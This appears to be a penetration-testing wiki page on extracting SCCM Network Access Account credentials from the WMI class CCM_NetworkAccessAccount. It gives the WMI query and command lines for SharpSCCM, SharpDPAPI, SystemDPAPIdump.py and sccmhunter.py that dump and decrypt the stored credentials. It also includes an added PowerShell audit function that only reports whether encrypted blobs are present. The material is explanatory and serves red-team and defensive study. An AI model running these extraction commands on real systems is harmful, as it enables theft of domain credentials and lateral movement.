Dump currently deployed secrets via WMI
The Network Access Account (NAA) is a domain account provisioned on a site server. SCCM clients use the NAA to download software from the distribution point. It serves no other purpose within the configuration.
The NAA credentials are stored in the CCM_NetworkAccessAccount class, located in the WMI namespace root\ccm\policy\Machine\ActualConfig.
The class contains two attributes that effectively hold stored credential data:
- NetworkAccessUsername
- NetworkAccessPassword
Both values hold encrypted data. With local administrative privileges, it's possible to use tools such as SharpSCCM and SharpDPAPI to decrypt the data blocks and retrieve the credentials for the currently configured NAA.
Requirements:
- Local administrator privileges on an SCCM client
To discover whether any NAA credentials are stored locally, run the following PowerShell command:
```powershell
Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
```
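For defenders auditing a client, the same query can be wrapped so that it reports only whether protected NAA blobs are present, without decrypting them. This is an added example, not part of the original page or of any tool named here; `Get-NaaPolicyExposure` is a hypothetical helper name, and the script assumes an elevated PowerShell session on the client.

```powershell
# Added example: audits the local SCCM client for stored NAA policy secrets.
# It only reports that protected blobs exist; it does not decrypt them.
# Get-NaaPolicyExposure is a hypothetical helper name, not part of any tool.
function Get-NaaPolicyExposure {
    [CmdletBinding()]
    param()

    $namespace = 'root\ccm\policy\Machine\ActualConfig'
    $className = 'CCM_NetworkAccessAccount'

    try {
        $instances = @(Get-CimInstance -Namespace $namespace -ClassName $className -ErrorAction Stop)
    }
    catch {
        # Namespace or class absent (no SCCM client), or the shell is not elevated.
        return [pscustomobject]@{
            ComputerName = $env:COMPUTERNAME
            Status       = 'QueryFailed'
            Detail       = $_.Exception.Message
        }
    }

    if ($instances.Count -eq 0) {
        return [pscustomobject]@{
            ComputerName = $env:COMPUTERNAME
            Status       = 'NoNaaPolicy'
            Detail       = 'Class exists but holds no instances'
        }
    }

    foreach ($instance in $instances) {
        # Cast to string so a null property yields length 0 instead of an error.
        $user = [string]$instance.NetworkAccessUsername
        $pass = [string]$instance.NetworkAccessPassword
        [pscustomobject]@{
            ComputerName = $env:COMPUTERNAME
            Status       = 'NaaSecretsPresent'
            Detail       = ('Username blob: {0} chars, password blob: {1} chars' -f $user.Length, $pass.Length)
        }
    }
}

Get-NaaPolicyExposure | Format-Table -AutoSize
```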
The following tools can be used to extract this information from the system.
```
SharpSCCM.exe local secrets -m wmi
```
{% code overflow="wrap" %}
```
SharpDPAPI.exe SCCM
```
{% endcode %}
```
python3 SystemDPAPIdump.py -sccm <domain>/<user>:<pass>@<ip>
```
```
sccmhunter.py -u <User> -p <Password> -target <ip>
```